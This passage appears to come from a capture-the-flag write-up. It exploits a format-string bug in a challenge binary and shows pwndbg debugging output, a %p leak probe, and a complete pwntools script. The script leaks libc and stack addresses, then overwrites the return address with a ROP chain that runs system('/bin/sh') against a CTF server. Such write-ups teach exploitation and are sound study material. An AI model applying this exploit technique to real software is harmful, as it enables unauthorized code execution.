 RSP  0x7fffffffd418 —▸ 0x5555555551e2 (main+89) ◂— add dword ptr [rbp - 0x214], 1
*RIP  0x7ffff78565b0 (printf+160) ◂— ret
───────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────────
 ► 0x7ffff78565b0 <printf+160>    ret                                <main+89>
    ↓
   0x5555555551e2 <main+89>       add    dword ptr [rbp - 0x214], 1        [0x7fffffffd42c] <= 33 (0x20 + 0x1)
   0x5555555551e9 <main+96>       cmp    dword ptr [rbp - 0x214], 0xd3     0x21 - 0xd3     EFLAGS => 0x297 [ CF PF AF zf SF IF df of ]
   0x5555555551f3 <main+106>    ✔ jle    main+42                     <main+42>
    ↓
   0x5555555551b3 <main+42>       mov    rdx, qword ptr [rip + 0x2e56]     RDX, [stdin@@GLIBC_2.2.5] => 0x7ffff7bc18c0 (_IO_2_1_stdin_) ◂— 0xfbad2288
   0x5555555551ba <main+49>       lea    rax, [rbp - 0x210]                RAX => 0x7fffffffd430 ◂— 0xa6473 /* 'sd\n' */
   0x5555555551c1 <main+56>       mov    esi, 0x200                        ESI => 0x200
   0x5555555551c6 <main+61>       mov    rdi, rax                          RDI => 0x7fffffffd430 ◂— 0xa6473 /* 'sd\n' */
   0x5555555551c9 <main+64>       call   fgets@plt                   <fgets@plt>

   0x5555555551ce <main+69>       lea    rax, [rbp - 0x210]
   0x5555555551d5 <main+76>       mov    rdi, rax
────────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd418 —▸ 0x5555555551e2 (main+89) ◂— add dword ptr [rbp - 0x214], 1
01:0008│-220 0x7fffffffd420 —▸ 0x7fffffffd630 —▸ 0x7fffffffd720 ◂— 1
02:0010│-218 0x7fffffffd428 ◂— 0x20ffffd498
03:0018│-210 0x7fffffffd430 ◂— 0xa6473 /* 'sd\n' */
04:0020│-208 0x7fffffffd438 ◂— 0x1958ac0
05:0028│-200 0x7fffffffd440 ◂— 0x7fff00000026 /* '&' */
06:0030│-1f8 0x7fffffffd448 —▸ 0x7ffff7ffd340 ◂— add byte ptr [rdi + 0x5f], bl
07:0038│-1f0 0x7fffffffd450 —▸ 0x7fffffffd570 —▸ 0x7ffff7ffd2f8 ◂— add byte ptr [rax], al /* 'J' */
──────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────
 ► 0   0x7ffff78565b0 printf+160
   1   0x5555555551e2 main+89
   2   0x7ffff78203f1 __libc_start_main+241
   3   0x5555555550ce _start+46
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> search 0x5555555551e2
Searching for byte: b'0x5555555551e2'
pwndbg> search -t qword  0x5555555551e2
Searching for an 8-byte integer: b'\xe2QUUUU\x00\x00'
[stack]         0x7fffffffd418 0x5555555551e2 (main+89)

pwndbg> p/x 0x7fffffffd430-0x7fffffffd418
$1 = 0x18

Here the second leak from %2$p is 24 bytes away from our target address. If we can overwrite that return address , then we can control the execution of program.

1
 ./main_patched
2
AAAAAAAAAAAAAAA%p%p%p%p%p%p%p%p%p%p%p%p%p%p
3
AAAAAAAAAAAAAAA0x790b8d9c37700x7fff1cc25bc00xfbad22880x5898ec3f503c0x790b8ddf77000x7fff1cc25dc00x201cc25c280x41414141414141410x25414141414141410x25702570257025700x25702570257025700x25702570257025700x79000a7025700x7fff1cc25c24

From this, I found that at from offset 8 , printf buffer starts , which we can use to overwrite the return address.

extra:here i tried for one_gadget, but there is no satisfying condition here.

Exploit#

1
 cat solve.py
2
#!/usr/bin/env python3
3

4
from pwn import *
5

6
elf = ELF("main_patched")
7
libc = ELF("libc-2.24.so")
8
ld = ELF("ld-2.24.so")
9

10
context.binary = elf
11
context.terminal = ['kitty','-e']
12

13
gdbscript = '''
14
b*main+89
15
c
16
'''
17

18
if args.REMOTE:
19
  p = remote('dnd.chals.damctf.xyz',30813)
20
elif args.GDB:
21
  p = gdb.debug(elf.path, gdbscript=gdbscript)
22
else:
23
  p = process(elf.path)
24

25
ld_offset = b'%205$p'
26
offset = 8
27
to_libc = 0x3c3770
28

29
p.sendline(b'%p')
30
leak = int(p.recvline(),16)
31
print(hex(leak))
32

33
#0x7ffe59bfdd18
34
libc.address = leak - to_libc
35
print(hex(libc.address))
36

37
one_gadget_addr1 = 0x4557a  # [rsp+0x30] == NULL
38
one_gadget_addr2 = 0xf0a51  # [rsp+0x40] == NULL
39
one_gadget_addr3 = 0xf18cb  # [rsp+0x60] == NULL
40

41
p.sendline(b'%2$p')
42
leak = int(p.recvline(),16)
43

44
ret_addr = leak - 24
45
print("ret addr:",hex(ret_addr))
46

47
bin_sh = next(libc.search(b"/bin/sh"))
48

49
writes = {
50
  ret_addr: libc.address + 0x000000000001fd7a,
51
  ret_addr+8 : bin_sh,
52
  ret_addr + 16 : libc.sym.system
53
}
54

55
payload = fmtstr_payload(9, writes)
56

57
p.sendline(payload)
58

59
p.interactive()